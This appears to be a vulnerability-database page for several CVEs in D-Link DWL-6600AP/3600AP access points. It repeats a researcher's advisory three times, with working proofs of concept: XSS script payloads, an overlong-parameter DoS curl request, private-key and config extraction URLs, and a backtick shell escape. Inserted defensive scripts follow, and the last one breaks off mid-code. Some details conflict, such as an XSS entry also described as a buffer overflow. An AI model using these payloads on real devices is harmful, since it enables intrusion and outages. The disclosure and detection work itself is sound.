CVSS V2: 4.6 CVSS V3: 7.8 Severity: HIGH |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is use of weak ciphers for SSH such as diffie-hellman-group1-sha1. D-Link 6600-AP and DWL-3600AP devices contain a cryptographic strength vulnerability. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to brute force SSH passwords. Currently there is no further information about this vulnerability; watch CNNVD or vendor announcements for updates.
# Security Advisory - 22/07/2019
## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14)
The D-Link 6600-AP is no longer produced, but support is still provided by D-Link, as described on the D-Link website. Note that this product is built for business customers of D-Link, so we can expect thousands of devices to be at risk. The code base is shared with the DWL-3600AP and DWL-8610AP.
### This advisory was sent to D-Link on 22/05/2019
Many thanks to the D-Link Security Team for their prompt response!
### Affected Product
D-Link 6600-AP, DWL-3600AP; vulnerability number 2 also affects the DWL-8610AP
### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
### Product Identifier
WLAN-EAP
### Hardware Version
A2
### Manufacturer
D-LINK
## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds and load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
## List of Vulnerabilities
1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files
7. CVE-2019-14332 - Use of weak ciphers for SSH
### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14338
#### Proof of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
### 2. Post-authenticated Certificate and RSA Private Key extraction through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14334
#### Proof of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
### 3. Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof of concept
kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14337
#### Proof of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14335
#### Proof of concept
http://10.90.90.91/admin.cgi?action=%s
### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14336
#### Proof of concept
http://10.90.90.91/admin.cgi?action=
### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14332
#### Proof of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
## Report Timeline
22/05/2019: This advisory was sent to D-Link; the contents of this report will be made public within 30 days.
22/06/2019: Public release of the security advisory to the mailing list
## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources
| VAR-201908-0915 | CVE-2019-14337 | D-Link 6600-AP and DWL-3600AP Vulnerabilities related to authorization, authority, and access control in devices |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is an ability to escape to a shell in the restricted command line interface, as demonstrated by the `/bin/sh -c wget` sequence. D-Link 6600-AP and DWL-3600AP devices have vulnerabilities related to authorization, permissions, and access control. Information may be obtained. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. No detailed description of the vulnerability is currently available. D-Link 6600-AP and DWL-3600AP version 4.2.0.14 have a permission and access control vulnerability. An attacker could exploit this vulnerability to escape the restricted CLI and obtain a shell.
# Security Advisory - 22/07/2019
## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14)
The D-Link 6600-AP is no longer produced, but support is still provided by D-Link, as described on the D-Link website. Note that this product is built for business customers of D-Link, so we can expect thousands of devices to be at risk. The code base is shared with the DWL-3600AP and DWL-8610AP.
### This advisory was sent to D-Link on 22/05/2019
Many thanks to the D-Link Security Team for their prompt response!
### Affected Product
D-Link 6600-AP, DWL-3600AP; vulnerability number 2 also affects the DWL-8610AP
### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
### Product Identifier
WLAN-EAP
### Hardware Version
A2
### Manufacturer
D-LINK
## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point for business environments. With high data transmission speeds and load balancing features, it can be deployed as a standalone wireless Access Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
## List of Vulnerabilities
1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated Certificate and RSA Private Key extraction through http command
3. CVE-2019-14333 - Pre-authenticated Denial of service leading to the reboot of the AP
4. CVE-2019-14337 - Escape shell in the restricted command line interface
5. CVE-2019-14335 - Post-authenticated Denial of service leading to the reboot of the AP
6. CVE-2019-14336 - Post-authenticated Dump all the config files
7. CVE-2019-14332 - Use of weak ciphers for SSH
### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14338
#### Proof of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
### 2. Post-authenticated Certificate and RSA Private Key extraction through http command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14334
#### Proof of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
### 3. Pre-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14333
#### Proof of concept
kali# curl -X POST
'http://10.90.90.91/admin.cgi?action=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
### 4. Escape shell in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14337
#### Proof of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
### 5. Post-authenticated Denial of service leading to the reboot of the AP
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14335
#### Proof of concept
http://10.90.90.91/admin.cgi?action=%s
### 6. Post-authenticated Dump all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14336
#### Proof of concept
http://10.90.90.91/admin.cgi?action=
### 7. Use of weak ciphers for SSH
#### Exploitation: Local
#### Severity Level: High
#### CVE ID: CVE-2019-14332
#### Proof of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
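For defenders, the HTTP proofs of concept above (items 1, 2, 3, 5 and 6) share one choke point, the `action` parameter of `admin.cgi` plus the `sslcert-get.cgi` handler, so they can be triaged from the AP's web access log. The following Python helper is an added example, not code from the advisory or from D-Link; it assumes Apache/nginx "combined" log format, the sample lines are constructed, and the 200-byte threshold for an overlong `action` value is a chosen value, not a limit stated in the advisory.

```python
"""Access-log triage for the admin.cgi / sslcert-get.cgi request patterns in
the D-Link DWL-6600AP / DWL-3600AP advisory.

Added example, not code from the advisory or from D-Link. Assumptions: the
AP's web server logs in Apache/nginx "combined" format, the sample lines
below are constructed, and LONG_ACTION_THRESHOLD is a chosen value, not a
limit stated in the advisory.
"""
import re
from urllib.parse import parse_qsl, urlsplit

# client - user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Assumption: the PoC sends several hundred 'A's; anything this long is abnormal.
LONG_ACTION_THRESHOLD = 200
SCRIPT_TAG_RE = re.compile(r'<\s*/?\s*script\b', re.IGNORECASE)


def classify_request(target):
    """Map one request target (path + query) to a list of (CVE, reason)."""
    findings = []
    parts = urlsplit(target)
    path = parts.path.lower()
    if path.endswith('/sslcert-get.cgi'):
        # CVE-2019-14334: the handler returns mini_httpd.pem (certificate + key).
        findings.append(('CVE-2019-14334',
                         'sslcert-get.cgi returns the certificate and RSA private key'))
        return findings
    if not path.endswith('/admin.cgi'):
        return findings
    # keep_blank_values: an empty action= is exactly the CVE-2019-14336 request.
    # parse_qsl also percent-decodes, so %3Cscript%3E is seen as <script>.
    for key, value in parse_qsl(parts.query, keep_blank_values=True):
        if key != 'action':
            continue
        if value == '':
            findings.append(('CVE-2019-14336', 'empty action= dumps all config files'))
        elif value == '%s':
            findings.append(('CVE-2019-14335', 'action=%s reboots the AP'))
        if len(value) >= LONG_ACTION_THRESHOLD:
            findings.append(('CVE-2019-14333',
                             'overlong action value (%d bytes) reboots the AP' % len(value)))
        if SCRIPT_TAG_RE.search(value):
            findings.append(('CVE-2019-14338', 'script tag in action= (reflected XSS)'))
    return findings


def scan_access_log(lines):
    """Return one finding dict per suspicious request; unparsable lines are skipped."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for cve, reason in classify_request(m['target']):
            hits.append({'client': m['client'], 'time': m['time'],
                         'status': int(m['status']), 'cve': cve, 'reason': reason})
    return hits


# Constructed sample log; 192.0.2.0/24 is documentation address space.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2019:10:00:01 +0000] "GET /admin.cgi?action=<script>alert(document.cookie)</script> HTTP/1.1" 200 512',
    '192.0.2.10 - - [22/May/2019:10:00:05 +0000] "POST /admin.cgi?action=' + 'A' * 300 + ' HTTP/1.1" 500 0',
    '192.0.2.11 - - [22/May/2019:10:01:00 +0000] "GET /admin.cgi?action=%s HTTP/1.1" 200 0',
    '192.0.2.11 - - [22/May/2019:10:01:30 +0000] "GET /admin.cgi?action= HTTP/1.1" 200 40960',
    '192.0.2.12 - - [22/May/2019:10:02:00 +0000] "GET /sslcert-get.cgi? HTTP/1.1" 200 3100',
    '192.0.2.12 - - [22/May/2019:10:02:10 +0000] "GET /admin.cgi?action=status HTTP/1.1" 200 2048',
]

if __name__ == '__main__':
    for hit in scan_access_log(SAMPLE_LOG):
        print('%(client)s %(cve)s: %(reason)s (HTTP %(status)d)' % hit)
```

Because these requests are post-authentication (except the overlong `action`), a hit from a client that is not a known administrator workstation is the signal worth alerting on, alongside upgrading to firmware 4.2.0.15 linked under Fixes/Updates.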
## Report Timeline
22/05/2019: This advisory is sent to D-Link; the contents of this report will be made public within 30 days.
22/06/2019: Public release of the security advisory to the mailing list
## Fixes/Updates
ftp://ftp2.dlink.com/PRODUCTS/DWL-3600AP/REVA/DWL-3600AP_REVA_FIRMWARE_v4.2.0.15.zip
ftp://ftp2.dlink.com/PRODUCTS/DWL-6600AP/REVA/DWL-6600AP_REVA_FIRMWARE_v4.2.0.15.zip
## About me - pwn.sandstorm@gmail.com
#### Independent EMSecurity Researcher in the field of IoT under the Sun
#### Always open to hack and share
#### Greetings - Ack P. Kim and others for the online resources
| VAR-201908-0916 | CVE-2019-14338 | D-Link 6600-AP and DWL-3600AP Device cross-site scripting vulnerability |
CVSS V2: 4.3 CVSS V3: 6.1 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authentication admin.cgi?action= XSS vulnerability on the management interface. D-Link 6600-AP and DWL-3600AP devices contain a cross-site scripting vulnerability. Information may be obtained and information may be altered. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. A buffer overflow vulnerability exists in the D-Link 6600-AP and DWL-3600AP. The vulnerability stems from a network system or product that does not properly validate data boundaries when performing operations on memory, causing erroneous read and write operations on other associated memory locations. An attacker could exploit the vulnerability to cause a buffer overflow or heap overflow. The vulnerability stems from the lack of correct validation of client data in web applications.
| VAR-201908-0912 | CVE-2019-14334 | Multiple D-Link product devices: vulnerability related to certificate validation |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP, DWL-3600AP, and DWL-8610AP Ax 4.2.0.14 21/03/2019 devices. There is post-authenticated Certificate and RSA Private Key extraction through an insecure sslcert-get.cgi HTTP command. D-Link 6600-AP, DWL-3600AP, and DWL-8610AP devices have a certificate validation vulnerability. Information may be obtained. The D-Link 6600-AP is a wireless access point device from D-Link of Taiwan. A security vulnerability exists in the D-Link 6600-AP, DWL-3600AP, and DWL-8610AP. D-Link 6600-AP, etc.
| VAR-201908-0911 | CVE-2019-14333 | D-Link 6600-AP and DWL-3600AP Vulnerability related to input validation on devices |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a pre-authenticated denial of service attack against the access point via a long action parameter to admin.cgi. D-Link 6600-AP and DWL-3600AP devices contain an input validation vulnerability. Service operation may be interrupted (DoS). The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. There are security vulnerabilities in the D-Link 6600-AP and DWL-3600AP. An attacker could exploit the vulnerability to cause a denial of service and make the device reboot.
| VAR-201908-0914 | CVE-2019-14336 | D-Link 6600-AP and DWL-3600AP Device input validation vulnerability |
CVSS V2: 2.1 CVSS V3: 5.5 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authenticated dump of all of the config files through a certain admin.cgi?action= insecure HTTP request. D-Link 6600-AP and DWL-3600AP devices contain an input validation vulnerability. Information may be obtained. D-Link DWL-6600AP is a dual-band unified-management wireless access point designed for enterprise environments. D-Link DWL-3600AP is a single-band unified-management wireless access point designed for enterprise environments.
D-Link DWL-6600AP and DWL-3600AP 4.2.0.14 have a configuration file dump vulnerability. A security vulnerability exists in D-Link 6600-AP and DWL-3600AP version 4.2.0.14.
| VAR-201907-1597 | CVE-2018-20872 | DrayTek routers cross-site request forgery vulnerability |
CVSS V2: 4.3 CVSS V3: 6.5 Severity: MEDIUM |
DrayTek routers before 2018-05-23 allow CSRF attacks to change DNS or DHCP settings, a related issue to CVE-2017-11649. The DrayTek router contains a cross-site request forgery vulnerability, associated with CVE-2017-11649. Information may be tampered with. DrayTek routers are router products of DrayTek Corporation of Taiwan, China
| VAR-201907-0427 | CVE-2019-12797 | ELM327 OBD2 Bluetooth Vulnerabilities related to the use of hard-coded credentials on devices |
CVSS V2: 7.5 CVSS V3: 9.8 Severity: CRITICAL |
A clone version of an ELM327 OBD2 Bluetooth device has a hardcoded PIN, leading to arbitrary commands to an OBD-II bus of a vehicle. The ELM327 OBD2 Bluetooth device contains a vulnerability related to the use of hard-coded credentials. Information may be obtained, information may be altered, and service operation may be disrupted (DoS). Elm Electronics ELM327 OBD2 Bluetooth is a Bluetooth device for scanning and reading vehicle codes, from Elm Electronics of Canada. A trust management vulnerability exists in the Elm Electronics ELM327 OBD2 Bluetooth device. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords, hard-coded passwords, hard-coded certificates, etc. to attack affected components
| VAR-201908-0913 | CVE-2019-14335 | D-Link 6600-AP and DWL-3600AP Authentication vulnerabilities in devices |
CVSS V2: 4.9 CVSS V3: 5.5 Severity: MEDIUM |
An issue was discovered on D-Link 6600-AP and DWL-3600AP Ax 4.2.0.14 21/03/2019 devices. There is a post-authenticated denial of service leading to the reboot of the AP via the admin.cgi?action=%s URI. The D-Link 6600-AP and DWL-3600AP devices contain an authentication vulnerability. Service operation interruption (DoS) is possible. The D-Link 6600-AP and DWL-3600AP are both wireless access point devices from D-Link, Taiwan. An authenticated attacker could exploit the vulnerability to cause a denial of service that reboots the device.
# Security Advisory - 22/07/2019
## Multiple vulnerabilities found in the D-Link 6600-AP device running the latest firmware (version 4.2.0.14)
The D-Link 6600-AP is no longer produced, but D-Link still provides support for it, as described on the D-Link website. Note that this product is built for D-Link's business customers, so thousands of devices can be expected to be at risk. Its code base is shared with the DWL-3600AP and DWL-8610AP.
### This advisory was sent to D-Link on 22/05/2019
Many Thanks to the D-Link Security Team for their prompt reactivity!
### Affected Product
D-Link 6600-AP, DWL-3600AP; vulnerability number 2 also affects the DWL-8610AP
### Firmware version
4.2.0.14 Revision Ax date: 21/03/2019
### Last version available
https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
### Product Identifier
WLAN-EAP
### Hardware Version
A2
### Manufacturer
D-LINK
## Product Description
The DWL-6600AP is designed to be the best-in-class indoor Access Point
for business environments. With high data transmission speeds, load
balancing features, it can be deployed as a standalone wireless Access
Point or used as the foundation for a managed wireless network.
Source: https://eu.dlink.com/uk/en/products/dwl-6600ap-unified-wireless-n-simultaneous-dual-band-poe-access-point
## List of Vulnerabilities
1. CVE-2019-14338 - Post-authenticated XSS
2. CVE-2019-14334 - Post-authenticated certificate and RSA private key extraction through an HTTP command
3. CVE-2019-14337 - Shell escape in the restricted command line interface
5. CVE-2019-14336 - Post-authenticated dump of all the config files
7. CVE-2019-14332 - Use of weak ciphers for SSH
### 1. Post-authenticated XSS
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14338
#### Proof-of concept
Example 1: http://10.90.90.91/admin.cgi?action=<script>alert(document.cookie)</script>
Example 2: http://10.90.90.91/admin.cgi?action=+guest<script>alert('Pwned')</script>
### 2. Post-authenticated certificate and RSA private key extraction through an HTTP command
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14334
#### Proof-of concept
http://10.90.90.91/sslcert-get.cgi?
Result of the command: File "mini_httpd.pem" automatically extracted
-----BEGIN RSA PRIVATE KEY-----
[private key material omitted]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
MIIDpTCCAo2gAwIBAgIEauy7rDANBgkqhkiG9w0BAQsFADB3MRQwEgYDVQQDEwsx
MC45MC45MC45MTEVMBMGA1UEChMMRC1MaW5rIENvcnAuMRUwEwYDVQQLEwxELUxp
bmsgQ29ycC4xFDASBgNVBAcTC1RhaXBlaSBDaXR5MQ4wDAYDVQQIEwVOZWlodTEL
MAkGA1UEBhMCVFcwHhcNOTkxMjMxMjAwMDIxWhcNMTkxMjI2MjAwMDIxWjCBsTEU
MBIGA1UEAxMLMTAuOTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjEVMBMG
A1UECxMMRC1MaW5rIENvcnAuMRQwEgYDVQQHEwtUYWlwZWkgQ2l0eTEOMAwGA1UE
CBMFTmVpaHUxCzAJBgNVBAYTAlRXMQswCQYDVQQGEwJUVzEUMBIGA1UEAxMLMTAu
OTAuOTAuOTExFTATBgNVBAoTDEQtTGluayBDb3JwLjCCASIwDQYJKoZIhvcNAQEB
BQADggEPADCCAQoCggEBAKBiAb2TZTzfQGprLKp2Y+EZsqMdbdzszeCsgMuZSOYp
wRwnnh5OSz6ikkvYVJ+gImvspuhmG2Ia8Nk+6kpV5nbSM6pgunLcP9WYPzb+7qXC
I+rPqAYqEK0t4vvt6Q6pHp4+x6lm9zT+xMTJhhJ85DDFRxjpCXsN9VVwayOXeyDW
2gINQb7DGJVADX4PekC8ksgugMImb+eXeg6ZoBc7e6/GMeoZIWbMS/WQeDvEJ7xK
YwC/beylIFV7bDtRQWMKf3pYStZxrSHI9YqtuhunvrzetXjzY8SMN6cHoGxC653N
29H+nLp8sfZ7VTRwuMrd42qUXxYMazGOJIEYF31no98CAwEAATANBgkqhkiG9w0B
AQsFAAOCAQEAb3SE7yOLixTbiSHvG/6QPGYYyo/Z7FcGOGya0wzw1MxG6lETYlSS
7A6Jm0b15VFuMOsDzucWNfLN8OfnImMpB9MqLhIU3gdx7yFpLw1ehXcrWK+TWqME
9SXIolyThrza9IV2I9+WKD4i7IfhIf4mm5OFyAh/vIpZQIpdjJiCOFKgCnihqYF5
beF63wqXndYsX2LkArXRhEWUmoRHQQgZoeEFTHhBYAlNbynXVkKKxTeFJZ24TDuE
45QTRcomj/vJAV94PM7cEAqUdHGM+HJxShcrODViwpSGiwiwCuuSxvo2wj3VLyef
MjAqvgTdQBIKlTBaHnuQOm4FZmN6sJUEdQ==
-----END CERTIFICATE-----
### 3. Shell escape in the restricted command line interface
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14337
#### Proof-of concept
DLINK-WLAN-AP# wget
Invalid command.
DLINK-WLAN-AP# `/bin/sh -c wget`
BusyBox v1.18.2 (2019-01-24 14:39:11 IST) multi-call binary.
Usage: wget [-c|--continue] [-s|--spider] [-q|--quiet]
[-O|--output-document FILE]
[--header 'header: value'] [-Y|--proxy on/off] [-P DIR]
[--no-check-certificate] [-U|--user-agent AGENT][-T SEC] URL
Retrieve files via HTTP or FTP
Options:
-s Spider mode - only check file existence
-c Continue retrieval of aborted transfer
-q Quiet
-P DIR Save to DIR (default .)
-T SEC Network read timeout is SEC seconds
-O FILE Save to FILE ('-' for stdout)
-U STR Use STR for User-Agent header
-Y Use proxy ('on' or 'off')
DLINK-WLAN-AP#
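The transcript above shows the classic failure of a restricted CLI: `wget` is refused as a command, but a backtick-quoted `/bin/sh -c wget` is executed, which means the wrapper hands the raw line to the shell (for expansion or tokenisation) before it consults its command allowlist. The following is an added example, not the D-Link CLI's code: a toy dispatcher with that exact defect next to a hardened variant that never evaluates the input. The allowlist (`help`, `show`) and the marker-file payload are constructed for the demonstration.

```sh
#!/bin/sh
# Added example, not the D-Link CLI's code: a toy restricted CLI that shows why
# letting the shell expand the input line before the allowlist check lets
# backticks escape, beside a variant that never evaluates the input.

ALLOWED="help show"    # hypothetical command allowlist

# Vulnerable: tokenises the line with eval, so command substitution (`...` and
# $(...)) runs BEFORE the first word is compared against the allowlist.
restricted_cli_vuln() {
    line=$1
    eval "set -- $line"            # any `cmd` in the input executes here
    case " $ALLOWED " in
        *" $1 "*) echo "ok: $1" ;;
        *)        echo "Invalid command."; return 1 ;;
    esac
}

# Hardened: reject anything outside a conservative character allowlist, then
# split on whitespace without eval (set -f keeps globbing off while splitting).
restricted_cli_safe() {
    line=$1
    if printf '%s' "$line" | grep -q '[^A-Za-z0-9 ._/-]'; then
        echo "Invalid command."; return 1
    fi
    set -f
    set -- $line
    set +f
    case " $ALLOWED " in
        *" $1 "*) echo "ok: $1" ;;
        *)        echo "Invalid command."; return 1 ;;
    esac
}

# Demonstration with a constructed marker file: the vulnerable dispatcher runs
# the backtick payload (and still prints "Invalid command.", just as the AP's
# prompt shows nothing useful in the PoC, because the payload's stdout is empty);
# the hardened one never runs it.
marker=$(mktemp)
rm -f "$marker"
restricted_cli_vuln "\`touch $marker\`" || true
[ -e "$marker" ] && echo "vuln: payload executed, marker file created"
rm -f "$marker"
restricted_cli_safe "\`touch $marker\`" || true
[ -e "$marker" ] || echo "safe: payload rejected, no marker file"
```

The fix is not a blocklist of backticks: `$(...)`, `;`, `|` and quoting tricks all reach `eval` the same way. Allowlisting characters and dispatching on an unevaluated token list is what removes the shell from the path.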
### 5. Post-authenticated dump of all the config files
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14336
#### Proof-of concept
http://10.90.90.91/admin.cgi?action=
### 7. Use of weak ciphers
#### Exploitation: Local
#### Severity Level: High
#### CVE ID : CVE-2019-14332
#### Proof-of concept
root@kali:~# ssh -l admin 10.90.90.91 -oKexAlgorithms=diffie-hellman-group1-sha1
The authenticity of host '10.90.90.91 (10.90.90.91)' can't be established.
RSA key fingerprint is SHA256:X8FPwxBpaDJq77gKs/HxggThGUIXWH4nu6tukuW6PGI.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.90.90.91' (RSA) to the list of known hosts.
admin@10.90.90.91's password:
Enter 'help' for help.
DLINK-WLAN-AP# help
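One caveat on the PoC above: the heading says "weak ciphers", but what the session actually proves is that the server accepts the 1024-bit `diffie-hellman-group1-sha1` key exchange, since the login completes with that KEX forced on the client side. A practitioner would enumerate the server's full advertised KEX, cipher and MAC lists (for example with `nmap -p 22 --script ssh2-enum-algos HOST` or ssh-audit, both assumed to be installed) and gate on them. The following is an added example, not D-Link's code, that performs that gate offline on constructed sample lists; the set of names it treats as legacy is this example's policy, not an OpenSSH-published list.

```sh
#!/bin/sh
# Added example, not D-Link's code: flag legacy SSH algorithms in the
# comma-separated lists a scanner reports. Sample lists below are constructed.

# Legacy names this example fails: 1024-bit group1 and other SHA-1 KEX, CBC
# modes, RC4/3DES/Blowfish/CAST, MD5 and truncated MACs. Tune to your policy.
WEAK_ALGOS="diffie-hellman-group1-sha1 diffie-hellman-group14-sha1
diffie-hellman-group-exchange-sha1 arcfour arcfour128 arcfour256 3des-cbc
blowfish-cbc cast128-cbc aes128-cbc aes192-cbc aes256-cbc
hmac-md5 hmac-md5-96 hmac-sha1-96"
WEAK_SET=" $(echo $WEAK_ALGOS) "     # single-line, space-delimited set

# weak_in LIST: print each legacy name found in comma-separated LIST, one per
# line; return 1 when any were found, 0 when the list is clean.
weak_in() {
    old_ifs=$IFS; IFS=,
    set -f; set -- $1; set +f          # split on commas, no globbing
    IFS=$old_ifs
    found=0
    for algo in "$@"; do
        case $WEAK_SET in
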